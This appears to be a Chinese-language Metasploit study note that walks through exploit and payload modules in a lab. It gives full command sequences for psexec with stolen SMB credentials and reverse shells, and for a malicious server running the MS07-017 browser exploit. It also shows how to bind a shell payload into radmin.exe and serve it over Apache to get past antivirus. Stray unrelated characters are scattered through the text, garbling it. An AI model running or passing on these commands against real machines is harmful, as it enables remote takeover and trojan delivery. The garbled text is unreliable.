Exploit模塊
RHOST遠(yuǎn)程主機(jī)苹享,LHOST本地主機(jī)
1.active阳谍,受害者的服務(wù)存在漏洞采记,攻擊者主動(dòng)向受害者發(fā)送漏洞利用代碼窿春。
實(shí)例:exploit/windows/smb/psexec
適用場(chǎng)景:攻擊者獲取到了受害者的賬號(hào)和密碼拉一,但是受害者機(jī)器上沒(méi)有開(kāi)放Telnet,遠(yuǎn)程桌面等服務(wù)旧乞。
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 192.168.80.150
msf exploit(psexec) > set smbuser coler
msf exploit(psexec) > set smbpass 123456
msf exploit(psexec) > set payload windows/shell/reverse_tcp
msf exploit(psexec) > set lhost 192.168.80.163
msf exploit(psexec) > exploit -j
msf exploit(handler) > sessions -u 1 將shell提升到meterpreter類(lèi)型的shell
2.passive蔚润,受害者的客戶端程序存在漏洞,攻擊者誘使受害者使用存在漏洞的客戶端程序尺栖,訪問(wèn)自己構(gòu)建好的 存在漏洞利用代碼的服務(wù)端程序嫡纠。
實(shí)例:exploit/windows/browser/ms07_017_ani_loadimage_chunksize
msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
msf exploit(ms07_017_ani_loadimage_chunksize) > set srvhost 192.168.80.163
msf exploit(ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp
msf exploit(ms07_017_ani_loadimage_chunksize) > set lhost 192.168.80.163
msf exploit(ms07_017_ani_loadimage_chunksize) > exploit
在存在漏洞的IE瀏覽器上訪問(wèn)http://192.168.80.163/,攻擊者會(huì)得到受害者的shell。
Payload模塊
msf > use payload/windows/shell_bind_tcp
msf payload(shell_bind_tcp) > generate -b '\x00'? 過(guò)濾壞字符(實(shí)際是使用encoders模塊將壞字符編碼)
msf payload(shell_bind_tcp) > generate -b '\x00\xff' -t exe -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f 123.exe? 將payload綁定到radmin.exe中
在靶機(jī)上運(yùn)行123.exe货徙,然后在攻擊機(jī)上連接靶機(jī)的4444端口左权,會(huì)獲得靶機(jī)的shell。
root@kali:/usr/share/windows-binaries# nc 192.168.80.11 4444
補(bǔ)充:有時(shí)將綁定payload的執(zhí)行程序拷貝到物理機(jī)上痴颊,會(huì)被物理機(jī)的殺毒軟件殺掉赏迟,可以先開(kāi)啟msf的Apache服務(wù),將exe程序放在/var/www/html目錄下蠢棱,然后通過(guò)虛擬機(jī)直接訪問(wèn)下載锌杀。
root@kali:~# service apache2 start
root@kali:~# cp 123.exe /var/www/html/